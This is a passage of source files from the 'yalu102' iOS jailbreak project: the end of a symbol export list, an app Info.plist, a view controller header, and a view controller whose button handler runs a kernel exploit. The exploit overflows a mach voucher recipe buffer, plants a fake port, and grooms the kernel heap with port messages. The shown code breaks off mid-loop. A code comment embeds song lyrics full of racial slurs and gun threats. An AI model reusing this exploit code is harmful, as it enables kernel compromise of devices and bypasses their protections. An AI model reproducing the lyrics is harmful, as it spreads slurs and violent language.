_OSKextParseVersionCFString, 593 | _OSKextParseVersionString, _OSKextReadLoadedKextInfo, 594 | _OSKextRemoveKextPersonalitiesFromKernel, _OSKextRemovePersonalitiesForIdentifierFromKernel, 595 | _OSKextResolveDependencies, _OSKextSendKextPersonalitiesToKernel, 596 | _OSKextSendPersonalitiesOfKextsToKernel, _OSKextSendPersonalitiesToKernel, 597 | _OSKextSetArchitecture, _OSKextSetLoadAddress, _OSKextSetLogFilter, 598 | _OSKextSetLogOutputFunction, _OSKextSetLoggingEnabled, 599 | _OSKextSetRecordsDiagnostics, _OSKextSetSimulatedSafeBoot, 600 | _OSKextSetUsesCaches, _OSKextStart, _OSKextStop, 601 | _OSKextSupportsArchitecture, _OSKextUnload, _OSKextUnloadKextWithIdentifier, 602 | _OSKextVLog, _OSKextVLogCFString, _OSKextValidate, 603 | _OSKextValidateDependencies, _OSKextVersionGetString, 604 | __CFURLCopyAbsolutePath, __IOAVStringAppendIndendationAndFormat, 605 | __IODataQueueEnqueueWithReadCallback, __IODispatchCalloutWithDispatch, 606 | __IOHIDCallbackApplier, __IOHIDCopyServiceIDs, __IOHIDCreateBinaryData, 607 | __IOHIDDeviceGetIOCFPlugInInterface, __IOHIDElementCreateWithElement, 608 | __IOHIDElementCreateWithParentAndData, __IOHIDElementGetCalibrationInfo, 609 | __IOHIDElementGetFlags, __IOHIDElementGetLength, 610 | __IOHIDElementGetValue, __IOHIDElementSetDevice, 611 | __IOHIDElementSetDeviceInterface, __IOHIDElementSetValue, 612 | __IOHIDEventCopyCFTypeContext, __IOHIDEventGetContext, 613 | __IOHIDEventSetCFTypeContext, __IOHIDEventSetContext, 614 | __IOHIDEventSystemAddConnection, __IOHIDEventSystemAddService, 615 | __IOHIDEventSystemAddServiceForConnection, __IOHIDEventSystemClientCopyClientRecords, 616 | __IOHIDEventSystemClientCopyEventForService, __IOHIDEventSystemClientCopyPropertyForService, 617 | __IOHIDEventSystemClientCopyServiceRecords, __IOHIDEventSystemClientDispatchEventFilter, 618 | __IOHIDEventSystemClientDispatchPropertiesChanged, 619 | __IOHIDEventSystemClientRegisterClientRecordsChangedBlock, 620 | __IOHIDEventSystemClientRegisterClientRecordsChangedCallback, 621 | __IOHIDEventSystemClientRegisterServiceRecordsChangedBlock, 622 | __IOHIDEventSystemClientRegisterServiceRecordsChangedCallback, 623 | __IOHIDEventSystemClientServiceConformsTo, __IOHIDEventSystemClientSetElementValueForService, 624 | __IOHIDEventSystemClientSetPropertyForService, __IOHIDEventSystemClientUnregisterClientRecordsChangedBlock, 625 | __IOHIDEventSystemClientUnregisterClientRecordsChangedCallback, 626 | __IOHIDEventSystemClientUnregisterServiceRecordsChangedBlock, 627 | __IOHIDEventSystemClientUnregisterServiceRecordsChangedCallback, 628 | __IOHIDEventSystemConnectionAddNotification, __IOHIDEventSystemConnectionAddServices, 629 | __IOHIDEventSystemConnectionContainsEntitlement, 630 | __IOHIDEventSystemConnectionContainsService, __IOHIDEventSystemConnectionCopyQueue, 631 | __IOHIDEventSystemConnectionCopyRecord, __IOHIDEventSystemConnectionCopyServices, 632 | __IOHIDEventSystemConnectionCreate, __IOHIDEventSystemConnectionEventFilterCompare, 633 | __IOHIDEventSystemConnectionFilterEvent, __IOHIDEventSystemConnectionGetEventFilterPriority, 634 | __IOHIDEventSystemConnectionGetExecutablePath, __IOHIDEventSystemConnectionGetPID, 635 | __IOHIDEventSystemConnectionGetPort, __IOHIDEventSystemConnectionGetReplyPort, 636 | __IOHIDEventSystemConnectionGetSystem, __IOHIDEventSystemConnectionPropertyChanged, 637 | __IOHIDEventSystemConnectionQueueStart, __IOHIDEventSystemConnectionQueueStop, 638 | __IOHIDEventSystemConnectionRecordClientChanged, 639 | __IOHIDEventSystemConnectionRecordServiceChanged, 640 | __IOHIDEventSystemConnectionRegisterDemuxCallback, 641 | __IOHIDEventSystemConnectionRegisterEventFilter, 642 | __IOHIDEventSystemConnectionRegisterPropertyChangedNotification, 643 | __IOHIDEventSystemConnectionRegisterRecordClientChanged, 644 | __IOHIDEventSystemConnectionRegisterRecordServiceChanged, 645 | __IOHIDEventSystemConnectionRegisterTerminationCallback, 646 | __IOHIDEventSystemConnectionRemoveAllServices, __IOHIDEventSystemConnectionRemoveNotification, 647 | __IOHIDEventSystemConnectionRemoveService, __IOHIDEventSystemConnectionScheduleAsync, 648 | __IOHIDEventSystemConnectionSetQueue, __IOHIDEventSystemConnectionUnregisterEventFilter, 649 | __IOHIDEventSystemConnectionUnregisterPropertyChangedNotification, 650 | __IOHIDEventSystemConnectionUnregisterRecordClientChanged, 651 | __IOHIDEventSystemConnectionUnregisterRecordServiceChanged, 652 | __IOHIDEventSystemConnectionUnscheduleAsync, __IOHIDEventSystemCopyRecord, 653 | __IOHIDEventSystemDispatchEvent, __IOHIDEventSystemGetPropertyForConnection, 654 | __IOHIDEventSystemPropertyChanged, __IOHIDEventSystemRegisterEventFilter, 655 | __IOHIDEventSystemRegisterRecordClientChanged, __IOHIDEventSystemRegisterRecordServiceChanged, 656 | __IOHIDEventSystemRemoveConnection, __IOHIDEventSystemRemoveService, 657 | __IOHIDEventSystemRemoveServicesForConnection, __IOHIDEventSystemSetPropertyForConnection, 658 | __IOHIDEventSystemUnregisterEventFilter, __IOHIDEventSystemUnregisterRecordClientChanged, 659 | __IOHIDEventSystemUnregisterRecordServiceChanged, 660 | __IOHIDHasEntitlement, __IOHIDLoadBundles, __IOHIDLog, 661 | __IOHIDQueueCopyElements, __IOHIDSerialize, __IOHIDServiceAddConnection, 662 | __IOHIDServiceClientCreate, __IOHIDServiceClientDispatchServiceRemoval, 663 | __IOHIDServiceClientRefresh, __IOHIDServiceClose, 664 | __IOHIDServiceContainsReportInterval, __IOHIDServiceContainsReportIntervalForClient, 665 | __IOHIDServiceCopyConnections, __IOHIDServiceCopyDebugDescriptionForClient, 666 | __IOHIDServiceCopyDispatchQueue, __IOHIDServiceCopyPropertyForClient, 667 | __IOHIDServiceCopyRecordForClient, __IOHIDServiceCreate, 668 | __IOHIDServiceCreateVirtual, __IOHIDServiceGetEventDeadlineForClient, 669 | __IOHIDServiceGetOwner, __IOHIDServiceGetReportInterval, 670 | __IOHIDServiceGetReportIntervalForClient, __IOHIDServiceIsInactive, 671 | __IOHIDServiceOpen, __IOHIDServiceRemoveConnection, 672 | __IOHIDServiceRemovePropertiesForClient, __IOHIDServiceScheduleAsync, 673 | __IOHIDServiceSetBatchIntervalForClient, __IOHIDServiceSetEventCallback, 674 | __IOHIDServiceSetEventDeadlineForClient, __IOHIDServiceSetPropertyForClient, 675 | __IOHIDServiceSetReportIntervalForClient, __IOHIDServiceUnscheduleAsync, 676 | __IOHIDSessionDispatchEvent, __IOHIDSessionGetPropertyForClient, 677 | __IOHIDSessionSetPropertyForClient, __IOHIDStringAppendIndendationAndFormat, 678 | __IOHIDUnserializeAndVMDealloc, __IOHIDUnserializeAndVMDeallocWithTypeID, 679 | __IOHIDValueCopyToElementValuePtr, __IOHIDValueCreateWithElementValuePtr, 680 | __IOHIDValueCreateWithStruct, __IOObjectCFRelease, 681 | __IOObjectCFRetain, __IOObjectConformsTo, __IOObjectCopyClass, 682 | __IOObjectGetClass, __IOReadBytesFromFile, __IOServiceGetAuthorizationID, 683 | __IOServiceSetAuthorizationID, __IOUSBDeviceDescriptionGetInfo, 684 | __IOWriteBytesToFile, __OSKextCopyKernelRequests, 685 | __OSKextCreateFolderForCacheURL, __OSKextReadCache, 686 | __OSKextReadFromIdentifierCacheForFolder, __OSKextSendResource, 687 | __OSKextSetStrictRecordingByLastOpened, __OSKextWriteCache, 688 | __OSKextWriteIdentifierCacheForKextsInDirectory, 689 | ___CachedPropertiesRefreshApplierFunction, ___ConnectionFunctionPickBatchInterval, 690 | ___GDBIOHIDEventSystemDump, ___IOHIDApplyPropertiesToDeviceFromDictionary, 691 | ___IOHIDApplyPropertyToDeviceSet, ___IOHIDDeviceGetRootKey, 692 | ___IOHIDDeviceGetUUIDKey, ___IOHIDDeviceGetUUIDString, 693 | ___IOHIDDeviceLoadProperties, ___IOHIDDeviceSaveProperties, 694 | ___IOHIDElementGetRootKey, ___IOHIDElementLoadProperties, 695 | ___IOHIDElementRegister, ___IOHIDElementSaveProperties, 696 | ___IOHIDEventSystemClientRefresh, ___IOHIDEventSystemClientRefreshServiceCallback, 697 | ___IOHIDEventSystemClientServiceReplaceCallback, 698 | ___IOHIDEventSystem_debug, ___IOHIDLoadElementSet, 699 | ___IOHIDManagerGetRootKey, ___IOHIDManagerLoadProperties, 700 | ___IOHIDManagerRegister, ___IOHIDManagerSaveProperties, 701 | ___IOHIDNotificationRegister, ___IOHIDPropertyLoadDictionaryFromKey, 702 | ___IOHIDPropertyLoadFromKeyWithSpecialKeys, ___IOHIDPropertySaveToKeyWithSpecialKeys, 703 | ___IOHIDPropertySaveWithContext, ___IOHIDQueueRegister, 704 | ___IOHIDSaveDeviceSet, ___IOHIDSaveElementSet, ___IOHIDServicePickBatchInterval, 705 | ___IOHIDSession, ___IOHIDSessionRef, ___IOHIDTransactionRegister, 706 | ___IOHIDValueRegister, ___IOUSBDeviceDescriptionRegister, 707 | ___OSKextBundleIDCompare, ___OSKextCacheNeedsUpdate, 708 | ___OSKextCheckURL, ___OSKextClearHasAllDependenciesOnKext, 709 | ___OSKextCompareIdentifiers, ___OSKextCopyExecutableRelativePath, 710 | ___OSKextCreateCacheFileURL, ___OSKextCreateCompositeKey, 711 | ___OSKextCreateFromIdentifierCacheDict, ___OSKextCreateIdentifierCacheDict, 712 | ___OSKextCreateKextRequest, ___OSKextDeallocateMmapBuffer, 713 | ___OSKextGetBleedthroughFlag, ___OSKextLogDependencyGraphApplierFunction, 714 | ___OSKextLogKernelMessages, ___OSKextMapExecutable, 715 | ___OSKextProcessKextRequestResults, ___OSKextReadRegistryNumberProperty, 716 | ___OSKextRealize, ___OSKextRealizeKextsWithIdentifier, 717 | ___OSKextRemoveIdentifierCacheForKext, ___OSKextRemovePersonalities, 718 | ___OSKextSendKextRequest, ___OSKextSetLoadAddress, 719 | ___OSKextStatURL, ___OSKextStatURLsOrURL, ___OSKextURLIsSystemFolder, 720 | ___OSKextUUIDCallback, ___OSKextUnload, ___SetNumPropertyForService, 721 | ___absPathOnVolume, ___kOSKextDiagnosticsFlagAllImplemented, 722 | ___sOSKextDefaultLogFunction, ___sOSKextLogOutputFunction, 723 | ___uuid_callback, __io_hideventsystem_clear_service_cache, 724 | __io_hideventsystem_copy_client_records, __io_hideventsystem_copy_event_for_service, 725 | __io_hideventsystem_copy_matching_services, __io_hideventsystem_copy_property, 726 | __io_hideventsystem_copy_property_for_service, __io_hideventsystem_copy_service_records, 727 | __io_hideventsystem_dispatch_event, __io_hideventsystem_open, 728 | __io_hideventsystem_queue_create, __io_hideventsystem_queue_start, 729 | __io_hideventsystem_queue_stop, __io_hideventsystem_register_event_filter, 730 | __io_hideventsystem_register_property_changed_notification, 731 | __io_hideventsystem_register_record_client_changed_notification, 732 | __io_hideventsystem_register_record_service_changed_notification, 733 | __io_hideventsystem_release_notification, __io_hideventsystem_service_conforms_to, 734 | __io_hideventsystem_set_element_value_for_service, 735 | __io_hideventsystem_set_properties, __io_hideventsystem_set_properties_for_service, 736 | __io_hideventsystem_unregister_event_filter, __io_hideventsystem_unregister_property_changed_notification, 737 | __io_hideventsystem_unregister_record_client_changed_notification, 738 | __io_hideventsystem_unregister_record_service_changed_notification, 739 | __io_kSCCompAnyRegex, __io_kSCDynamicStoreDomainState, 740 | __iohideventsystem_client_dispatch_client_records_changed, 741 | __iohideventsystem_client_dispatch_event_filter, 742 | __iohideventsystem_client_dispatch_notification_results, 743 | __iohideventsystem_client_dispatch_properties_changed, 744 | __iohideventsystem_client_dispatch_service_records_changed, 745 | __iohideventsystem_client_dispatch_service_removal, 746 | __iohideventsystem_client_subsystem, __iohideventsystem_subsystem, 747 | __isArray, __isDictionary, __isString, __pm_connect, 748 | __pm_disconnect, _createCFStringForData, _createCFStringForPlist_new, 749 | _createUTF8CStringForCFString, _defaultSettings, 750 | _ev_try_lock, _ev_unlock, _fat_iterator_close, _fat_iterator_file_end, 751 | _fat_iterator_file_start, _fat_iterator_find_arch, 752 | _fat_iterator_find_fat_arch, _fat_iterator_find_host_arch, 753 | _fat_iterator_for_data, _fat_iterator_is_iterable, 754 | _fat_iterator_next_arch, _fat_iterator_num_arches, 755 | _fat_iterator_open, _fat_iterator_reset, _gIOCFPlugInInterfaceID, 756 | _gIOKitLibSerializeOptions, _gIOKitLibServerVersion, 757 | _getEffectivePageSize, _hid_dispatch_pthread_root_queue_create, 758 | _hid_dispatch_queue_create, _hid_dispatch_queue_release, 759 | _hid_pthread_attr_init, _io_hideventsystem_clear_service_cache, 760 | _io_hideventsystem_copy_client_records, _io_hideventsystem_copy_event_for_service, 761 | _io_hideventsystem_copy_matching_services, _io_hideventsystem_copy_property, 762 | _io_hideventsystem_copy_property_for_service, _io_hideventsystem_copy_service_records, 763 | _io_hideventsystem_dispatch_event, _io_hideventsystem_open, 764 | _io_hideventsystem_queue_create, _io_hideventsystem_queue_start, 765 | _io_hideventsystem_queue_stop, _io_hideventsystem_register_event_filter, 766 | _io_hideventsystem_register_property_changed_notification, 767 | _io_hideventsystem_register_record_client_changed_notification, 768 | _io_hideventsystem_register_record_service_changed_notification, 769 | _io_hideventsystem_release_notification, _io_hideventsystem_service_conforms_to, 770 | _io_hideventsystem_set_element_value_for_service, 771 | _io_hideventsystem_set_properties, _io_hideventsystem_set_properties_for_service, 772 | _io_hideventsystem_unregister_event_filter, _io_hideventsystem_unregister_property_changed_notification, 773 | _io_hideventsystem_unregister_record_client_changed_notification, 774 | _io_hideventsystem_unregister_record_service_changed_notification, 775 | _io_pm_assertion_activity_aggregate, _io_pm_assertion_activity_log, 776 | _io_pm_assertion_copy_details, _io_pm_assertion_create, 777 | _io_pm_assertion_notify, _io_pm_assertion_retain_release, 778 | _io_pm_assertion_set_properties, _io_pm_cancel_repeat_events, 779 | _io_pm_change_sa_assertion_behavior, _io_pm_connection_acknowledge_event, 780 | _io_pm_connection_copy_status, _io_pm_connection_create, 781 | _io_pm_connection_release, _io_pm_connection_schedule_notification, 782 | _io_pm_ctl_assertion_type, _io_pm_declare_network_client_active, 783 | _io_pm_declare_system_active, _io_pm_declare_user_active, 784 | _io_pm_force_active_settings, _io_pm_get_capability_bits, 785 | _io_pm_get_uuid, _io_pm_get_value_int, _io_pm_hid_event_copy_history, 786 | _io_pm_hid_event_report_activity, _io_pm_last_wake_time, 787 | _io_pm_schedule_power_event, _io_pm_schedule_repeat_event, 788 | _io_pm_set_active_profile, _io_pm_set_bt_wake_interval, 789 | _io_pm_set_debug_flags, _io_pm_set_dw_linger_interval, 790 | _io_pm_set_sleepservice_wake_time_cap, _io_pm_set_value_int, 791 | _io_ps_copy_chargelog, _io_ps_copy_powersources_info, 792 | _io_ps_new_pspowersource, _io_ps_release_pspowersource, 793 | _io_ps_update_pspowersource, _iohideventsystem_client_dispatch_client_records_changed, 794 | _iohideventsystem_client_dispatch_event_filter, 795 | _iohideventsystem_client_dispatch_notification_results, 796 | _iohideventsystem_client_dispatch_properties_changed, 797 | _iohideventsystem_client_dispatch_service_records_changed, 798 | _iohideventsystem_client_dispatch_service_removal, 799 | _iohideventsystem_client_server, _iohideventsystem_client_server_routine, 800 | _iohideventsystem_server, _iohideventsystem_server_routine, 801 | _iokit_user_client_trap, _isCrossLinking, _kIOEthernetHardwareAddress, 802 | _kIOHIDEventSystemConnectionDispatchFilterWaitTimeoutMS, 803 | _kIOHIDFilterPluginArrayCallBacks, _kIOHIDServerConnectionRootQueue, 804 | _kIOHIDServiceEnumerationRootQueue, _kIOHIDServiceInterruptRootQueue, 805 | _kIOMasterPortDefault, _kIOUserEthernetInterfaceMergeProperties, 806 | _kIOUserEthernetInterfaceRole, _kOSKextDependencyCircularReference, 807 | _kOSKextDependencyCompatibleVersionUndeclared, _kOSKextDependencyInauthentic, 808 | _kOSKextDependencyIndirectDependencyUnresolvable, 809 | _kOSKextDependencyIneligibleInSafeBoot, _kOSKextDependencyInvalid, 810 | _kOSKextDependencyLoadedCompatibleVersionUndeclared, 811 | _kOSKextDependencyLoadedIsIncompatible, _kOSKextDependencyMultipleVersionsDetected, 812 | _kOSKextDependencyNoCompatibleVersion, _kOSKextDependencyRawAndComponentKernel, 813 | _kOSKextDependencyUnavailable, _kOSKextDiagnosticBadPropertyListXMLKey, 814 | _kOSKextDiagnosticBadSystemPropertyKey, _kOSKextDiagnosticBundleIdentifierMismatchKey, 815 | _kOSKextDiagnosticBundleVersionMismatchKey, _kOSKextDiagnosticCodelessWithLibrariesKey, 816 | _kOSKextDiagnosticCompatibleVersionLaterThanVersionKey, 817 | _kOSKextDiagnosticDeclaresBothKernelAndKPIDependenciesKey, 818 | _kOSKextDiagnosticDeclaresNoKPIsWarningKey, _kOSKextDiagnosticDeclaresNonKPIDependenciesKey, 819 | _kOSKextDiagnosticDeprecatedPropertyKey, _kOSKextDiagnosticExecutableArchNotFoundKey, 820 | _kOSKextDiagnosticExecutableBadKey, _kOSKextDiagnosticExecutableMissingKey, 821 | _kOSKextDiagnosticFileAccessKey, _kOSKextDiagnosticFileNotFoundKey, 822 | _kOSKextDiagnosticIdentifierOrVersionTooLongKey, 823 | _kOSKextDiagnosticIneligibleInSafeBoot, _kOSKextDiagnosticKernelComponentNotInterfaceKey, 824 | _kOSKextDiagnosticMissingPropertyKey, _kOSKextDiagnosticNoExplicitKernelDependencyKey, 825 | _kOSKextDiagnosticNoFileKey, _kOSKextDiagnosticNonAppleKextDeclaresPrivateKPIDependencyKey, 826 | _kOSKextDiagnosticNonuniqueIOResourcesMatchKey, 827 | _kOSKextDiagnosticNotABundleKey, _kOSKextDiagnosticNotSignedKey, 828 | _kOSKextDiagnosticOwnerPermissionKey, _kOSKextDiagnosticPersonalityHasDifferentBundleIdentifierKey, 829 | _kOSKextDiagnosticPersonalityHasNoBundleIdentifierKey, 830 | _kOSKextDiagnosticPersonalityNamesKextWithNoExecutableKey, 831 | _kOSKextDiagnosticPersonalityNamesNonloadableKextKey, 832 | _kOSKextDiagnosticPersonalityNamesUnknownKextKey, 833 | _kOSKextDiagnosticPropertyIsIllegalTypeKey, _kOSKextDiagnosticPropertyIsIllegalValueKey, 834 | _kOSKextDiagnosticRawKernelDependency, _kOSKextDiagnosticSharedExecutableAndExecutableKey, 835 | _kOSKextDiagnosticSharedExecutableKextMissingKey, 836 | _kOSKextDiagnosticStatFailureKey, _kOSKextDiagnosticSymlinkKey, 837 | _kOSKextDiagnosticTypeWarningKey, _kOSKextDiagnosticURLConversionKey, 838 | _kOSKextDiagnosticsAuthenticationKey, _kOSKextDiagnosticsBootLevelKey, 839 | _kOSKextDiagnosticsDependenciesKey, _kOSKextDiagnosticsDependencyNotOSBundleRequired, 840 | _kOSKextDiagnosticsInterfaceDependencyCount, _kOSKextDiagnosticsValidationKey, 841 | _kOSKextDiagnosticsWarningsKey, _kOSKextLoadNotification, 842 | _kOSKextUnloadNotification, _macho_find_dysymtab, 843 | _macho_find_section_numbered, _macho_find_source_version, 844 | _macho_find_symbol, _macho_find_symtab, _macho_find_uuid, 845 | _macho_get_section_by_name, _macho_get_section_by_name_64, 846 | _macho_get_segment_by_name, _macho_get_segment_by_name_64, 847 | _macho_remove_linkedit, _macho_scan_load_commands, 848 | _macho_swap, _macho_trim_linkedit, _macho_unswap, 849 | _previouslySerialized, _printPList_new, _recordObjectInIDRefDictionary, 850 | _roundPageCrossSafe, _roundPageCrossSafeFixedWidth, 851 | _setCrossLinkPageSize, _showPList_new ] 852 | ... 853 | -------------------------------------------------------------------------------- /yalu102/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | en 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | APPL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | LSRequiresIPhoneOS 22 | 23 | UILaunchStoryboardName 24 | LaunchScreen 25 | UIMainStoryboardFile 26 | Main 27 | UIRequiredDeviceCapabilities 28 | 29 | armv7 30 | 31 | UISupportedInterfaceOrientations 32 | 33 | UIInterfaceOrientationPortrait 34 | UIInterfaceOrientationLandscapeLeft 35 | UIInterfaceOrientationLandscapeRight 36 | 37 | UISupportedInterfaceOrientations~ipad 38 | 39 | UIInterfaceOrientationPortrait 40 | UIInterfaceOrientationPortraitUpsideDown 41 | UIInterfaceOrientationLandscapeLeft 42 | UIInterfaceOrientationLandscapeRight 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /yalu102/ViewController.h: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.h 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 05/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface ViewController : UIViewController 12 | { 13 | IBOutlet UIButton* dope; 14 | } 15 | - (IBAction)yolo:(id)sender; 16 | 17 | @end 18 | 19 | -------------------------------------------------------------------------------- /yalu102/ViewController.m: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.m 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 05/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 7 | // 8 | 9 | #import "offsets.h" 10 | #import "ViewController.h" 11 | #import 12 | #import 13 | #import 14 | #undef __IPHONE_OS_VERSION_MIN_REQUIRED 15 | #import 16 | #include 17 | 18 | extern uint64_t procoff; 19 | 20 | typedef struct { 21 | mach_msg_header_t head; 22 | mach_msg_body_t msgh_body; 23 | mach_msg_ool_ports_descriptor_t desc[256]; 24 | char pad[4096]; 25 | } sprz; 26 | 27 | @interface ViewController () 28 | 29 | @end 30 | 31 | @implementation ViewController 32 | 33 | - (void)viewDidLoad { 34 | [super viewDidLoad]; 35 | init_offsets(); 36 | struct utsname u = { 0 }; 37 | uname(&u); 38 | 39 | 40 | if (strstr(u.version, "MarijuanARM")) { 41 | [dope setEnabled:NO]; 42 | [dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; 43 | } 44 | 45 | // Do any additional setup after loading the view, typically from a nib. 46 | } 47 | 48 | typedef natural_t not_natural_t; 49 | 50 | struct not_essers_ipc_object { 51 | not_natural_t io_bits; 52 | not_natural_t io_references; 53 | char io_lock_data[1337]; 54 | /* 55 | 56 | https://www.youtube.com/watch?v=ZADJ8S1qH3U 57 | 58 | 59 | [Intro] 60 | Lets get it 61 | Steve Drive 62 | R.I.P L'A Capone 63 | OTF 64 | These nigga's steady woofing like they want beef, want beef? 65 | You want smoke? You want smoke? Just tell me 66 | 67 | [Hook] 68 | These niggas steady woofing like they want beef, want beef?[You want smoke?] 69 | I can make that happen if you want beef, you want beef?[You want smoke?] 70 | Catch you while you're capping with this semi, semi 71 | Put the semi-automatic to your kidney, kidney 72 | 73 | [Verse 1] 74 | Put the semi-automatic to your kidney, kidney 75 | I'm off the dope I got the pole you talking tough you getting smoked 76 | These nigga's steady woofing like they want beef, but I really know 77 | Glock or nickel yeah that bitch go, I'm going like I'm at a fucking show 78 | I'm off Tu pack saying fuck Jojo[Fuck Jojo] 79 | Talking shit get your life took no joke 80 | I'm with my nigga's and my niggas ain't no joke 81 | And if you got that fucking bag then you getting poked 82 | And if you acting tough, I'ma fucking blow, and that's on Pluto[On Pluto] 83 | Me and Durk finna spaz, and I put that on the guys, it's homicides 84 | Cause we dropping Y's[Die Y, Die Y], head shot got him traumatized 85 | And you want beef?[You want beef fu nigga?] but when I see you, you don't speak?[You don't even talk] 86 | I got my 9 on me[Rondo] and I'ma blow and that's on me[I'm Rondo] 87 | I'm getting tree tree[Getting dope], getting top from a bitch named Kiki 88 | 89 | [Chorus] 90 | 91 | [Verse 2] 92 | And if you really want smoke[You want smoke little nigga?] 93 | I will give your ass smoke[Give your ass smoke little nigga?] 94 | This Glock 9 bitch I tote, and I will put it to your throat 95 | I'm off this Tooka pack and no L'A, I'ma go crazy 96 | You supposed to be my nigga but actin' like a fan that’s crazy 97 | What the fuck wrong with these nigga's, they fugazi 98 | I made this song for the niggas, cause they crazy 99 | Separate me from them niggas[Separate Rondo] 100 | Pull up on your block, with the mops 101 | Then I hit the dip and put him up in case of attempts[Incase a nigga survive] 102 | But we don't make throws, we shoot like Pimp[We shoot to kill] 103 | I got 23[Two three] So i don't fucking speak[I don't speak] 104 | Riding fast, I hit the dash, ain't gon last[You ain't gonna last nigga], I'ma blast[Cause ima blast on a nigga] 105 | Numba Nine, bitch [I'm #9 lil nigga], and I'm a sav, bitch 106 | 107 | [Chorus] 108 | */ 109 | 110 | }; 111 | 112 | 113 | 114 | #define IO_BITS_ACTIVE 0x80000000 115 | #define IKOT_TASK 2 116 | #define IKOT_IOKIT_CONNECT 29 117 | #define IKOT_CLOCK 25 118 | 119 | char dt[128]; 120 | - (IBAction)yolo:(UIButton*)sender 121 | { 122 | /* 123 | 124 | we out here! 125 | 126 | */ 127 | 128 | mach_port_t vch = 0; 129 | 130 | mach_voucher_attr_recipe_data_t *data = malloc(sizeof(mach_voucher_attr_recipe_data_t) + 0x10); 131 | data->content_size = 0; 132 | data->key=MACH_VOUCHER_ATTR_KEY_BANK; 133 | data->command=610; 134 | data->previous_voucher=MACH_PORT_NULL; 135 | 136 | kern_return_t lol = host_create_mach_voucher(mach_host_self(), data, sizeof(mach_voucher_attr_recipe_data_t), &vch); 137 | 138 | assert(lol==0 && vch!=0); 139 | 140 | 141 | unsigned char* odata = mmap(0, 0x8000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0); 142 | unsigned char* fdata = mmap(odata+0x4000, 0x4000, PROT_NONE, MAP_PRIVATE|MAP_ANON|MAP_FIXED, -1, 0); 143 | assert(fdata == odata + 0x4000); 144 | memset(odata, 0x42, 0x0); 145 | 146 | 147 | uint64_t rsz = 0x100; // alloc size; 148 | fdata -= rsz + 0x100; // overflow full chunk 149 | 150 | struct not_essers_ipc_object* fakeport = mmap(0, 0x8000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0); 151 | 152 | mlock(fakeport, 0x8000); 153 | 154 | fakeport->io_bits = IO_BITS_ACTIVE | IKOT_CLOCK; 155 | fakeport->io_lock_data[12] = 0x11; 156 | 157 | *(uint64_t*) (fdata + rsz) = (uint64_t) fakeport; 158 | 159 | 160 | mach_port_t* ports = calloc(800, sizeof(mach_port_t)); 161 | 162 | for (int i = 0; i < 800; i++) { 163 | mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports[i]); 164 | mach_port_insert_right(mach_task_self(), ports[i], ports[i], MACH_MSG_TYPE_MAKE_SEND); 165 | } 166 | sprz msg1; 167 | 168 | memset(&msg1, 0, sizeof(sprz)); 169 | sprz msg2; 170 | 171 | memset(&msg2, 0, sizeof(sprz)); 172 | msg1.msgh_body.msgh_descriptor_count = 128; 173 | 174 | msg1.head.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0) | MACH_MSGH_BITS_COMPLEX; 175 | msg1.head.msgh_local_port = MACH_PORT_NULL; 176 | msg1.head.msgh_size = sizeof(msg1)-2048; 177 | 178 | mach_port_t* buffer = calloc(0x1000, sizeof(mach_port_t)); 179 | for (int i = 0; i < 0x1000; i++) { 180 | buffer[i] = MACH_PORT_DEAD; 181 | } 182 | 183 | for (int i = 0; i < 256; i++) { 184 | msg1.desc[i].address = buffer; 185 | msg1.desc[i].count = 0x100/8; 186 | msg1.desc[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR; 187 | msg1.desc[i].disposition = 19; 188 | } 189 | 190 | pthread_yield_np(); 191 | for (int i=1; i<300; i++) { 192 | msg1.head.msgh_remote_port = ports[i]; 193 | kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); 194 | assert(kret==0); 195 | } 196 | 197 | pthread_yield_np(); 198 | for (int i=500; i<800; i++) { 199 | msg1.head.msgh_remote_port = ports[i]; 200 | kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); 201 | assert(kret==0); 202 | } 203 | 204 | pthread_yield_np(); 205 | for (int i=300; i<500; i++) { 206 | msg1.head.msgh_remote_port = ports[i]; 207 | if (i%4 == 0) { 208 | msg1.msgh_body.msgh_descriptor_count = 1; 209 | } else { 210 | msg1.msgh_body.msgh_descriptor_count = 256; 211 | } 212 | kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); 213 | assert(kret==0); 214 | } 215 | 216 | pthread_yield_np(); 217 | for (int i = 300; i<500; i+=4) { 218 | msg2.head.msgh_local_port = ports[i]; 219 | kern_return_t kret = mach_msg(&msg2.head, MACH_RCV_MSG, 0, sizeof(msg1), ports[i], 0, 0); 220 | if(!(i < 380)) 221 | ports[i] = 0; 222 | assert(kret==0); 223 | } 224 | for (int i = 300; i<380; i+=4) { 225 | msg1.head.msgh_remote_port = ports[i]; 226 | msg1.msgh_body.msgh_descriptor_count = 1; 227 | kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); 228 | assert(kret==0); 229 | } 230 | 231 | mach_voucher_extract_attr_recipe_trap(vch, MACH_VOUCHER_ATTR_KEY_BANK, fdata, &rsz); 232 | mach_port_t foundport = 0; 233 | for (int i=1; i<500; 